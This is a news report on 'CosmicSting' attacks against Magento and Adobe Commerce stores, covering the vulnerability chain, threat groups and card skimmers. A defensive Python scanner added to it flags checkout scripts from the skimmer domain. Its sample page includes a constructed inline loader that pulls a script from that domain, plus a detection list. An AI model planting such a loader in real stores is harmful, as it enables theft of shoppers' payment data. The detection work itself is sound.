Adobe Commerce and Magento online stores are being targeted in "CosmicSting" attacks at an alarming rate, with threat actors hacking approximately 5% of all stores.

Website security company Sansec has been tracking the attacks since June 2024 and has observed 4,275 stores breached in CosmicSting attacks, with high-profile victims including Whirlpool, Ray-Ban, National Geographic, Segway, and Cisco, as BleepingComputer reported last month.

The researchers are now tracking seven different threat groups that employ CosmicSting to compromise unpatched sites, named "Bobry," "Polyovki," "Surki," "Burunduki," "Ondatry," "Khomyaki," and "Belki." These groups are considered financially motivated opportunists, breaching the sites to steal credit card and customer information. The threat actors are leveraging CosmicSting to steal Magento cryptographic keys, inject payment skimmers that steal cards from order checkout webpages, and even fight each other for control over vulnerable stores.

Sansec told BleepingComputer that it has warned many of the sites, including Ray-Ban, Whirlpool, National Geographic, and Segway, about these attacks multiple times but has not heard back from any of them. Sansec founder Willem de Groot says that Segway and Whirlpool appear to be fixed, and BleepingComputer could not find the malicious code on Ray-Ban's site, indicating it may be fixed as well.

The CosmicSting vulnerability (CVE-2024-32102) is a critical-severity information disclosure flaw; when chained with CVE-2024-2961, a security issue in glibc's iconv function, an attacker can achieve remote code execution on the target server. Sansec says that multiple threat actors are now conducting attacks because patching speed is not matching the critical nature of the situation.

"Sansec projects that more stores will get hacked in the coming months, as 75% of the Adobe Commerce & Magento install base hadn't patched when the automated scanning for secret encryption keys started," warns Sansec.
Ondatry was using the "TrojanOrder" flaw in 2022 but has now moved to CosmicSting, which shows how some threat actors specialize in this space and continually look for opportunities in easily exploitable critical vulnerabilities. The Polyovki threat actors use 'cdnstatics[.]net' to make their injected scripts appear to be website analytics, as seen in the compromise of Ray-Ban's online store. Sansec has provided a tool that site owners can use to check whether their store is vulnerable, and an "emergency hotfix" has been released to block most CosmicSting attacks, with both available here.
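The skimmer injection described above relies on a checkout page loading a script from a domain the store never intended to trust, disguised as analytics. A store operator can catch this shape without Sansec's tooling by inventorying every script a checkout page loads and comparing it against an allowlist plus the indicator named in the article. The following scanner is an added example, not code from Sansec or BleepingComputer; the allowlist hosts, the `scan_sample()` helper and the sample checkout HTML are constructed for illustration, and the only real indicator it uses is the cdnstatics[.]net domain quoted in the article.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicator taken from the article: the domain the "Polyovki" group used to host
# skimmer scripts disguised as analytics (written defanged as cdnstatics[.]net).
KNOWN_SKIMMER_DOMAINS = {"cdnstatics.net"}

# Hypothetical allowlist of script hosts this store expects on its checkout page.
# A real deployment would derive this from the store's own static-content build.
ALLOWED_SCRIPT_HOSTS = {"shop.example.com", "static.shop.example.com"}


class ScriptCollector(HTMLParser):
    """Collect the src of every external <script> and the body of every inline one."""

    def __init__(self):
        super().__init__()
        self.external = []      # src URLs of <script src="..."> tags
        self.inline = []        # bodies of <script>...</script> blocks without src
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers script content as raw data, so this captures inline loaders.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def host_of(url):
    """Lowercase host of an absolute or protocol-relative URL; '' for a same-origin relative path."""
    if url.startswith("//"):
        url = "https:" + url
    return (urlparse(url).hostname or "").lower()


def find_suspicious_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS,
                            ioc_domains=KNOWN_SKIMMER_DOMAINS):
    """Return (severity, reason, evidence) tuples for scripts that should not be on a checkout page."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []

    for src in collector.external:
        host = host_of(src)
        if not host:
            continue  # relative path, served by the store itself
        if host in ioc_domains or any(host.endswith("." + d) for d in ioc_domains):
            findings.append(("high", "script loaded from known skimmer domain", src))
        elif host not in allowed_hosts:
            findings.append(("medium", "script loaded from host outside allowlist", src))

    # Skimmers are often injected as a small inline loader that creates a <script>
    # element at runtime, so the indicator must also be matched inside inline bodies.
    for body in collector.inline:
        if any(d in body for d in ioc_domains):
            findings.append(("high", "inline script references known skimmer domain",
                             body.strip()[:80]))
    return findings


# Constructed sample of a compromised checkout page: one legitimate first-party script,
# one direct load from the indicator domain, one inline loader for the same domain,
# and one ordinary relative Magento asset.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="https://static.shop.example.com/js/checkout.js"></script>
<script src="https://cdnstatics.net/analytics.js"></script>
<script>
  var s=document.createElement('script');s.src='//cdnstatics.net/stats.min.js';
  document.head.appendChild(s);
</script>
<script src="/static/version1/frontend/Magento/luma/en_US/mage/cookies.js"></script>
</head><body>checkout form here</body></html>
"""


def scan_sample():
    """Run the scanner over the constructed sample page."""
    return find_suspicious_scripts(SAMPLE_CHECKOUT_HTML)


if __name__ == "__main__":
    for severity, reason, evidence in scan_sample():
        print(f"[{severity}] {reason}: {evidence}")
```

Running this against the sample reports two high-severity findings (the direct load and the inline loader) and nothing for the allowlisted or relative scripts. In practice the HTML fed in should be the page as actually served to a shopper, since CosmicSting-injected content lives in the store's database-backed CMS blocks rather than on disk, and the allowlist should be kept deliberately short so that any newly appearing third-party host is surfaced for review.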
Published on www.bleepingcomputer.com, Thu, 03 Oct 2024 17:20:22 +0000.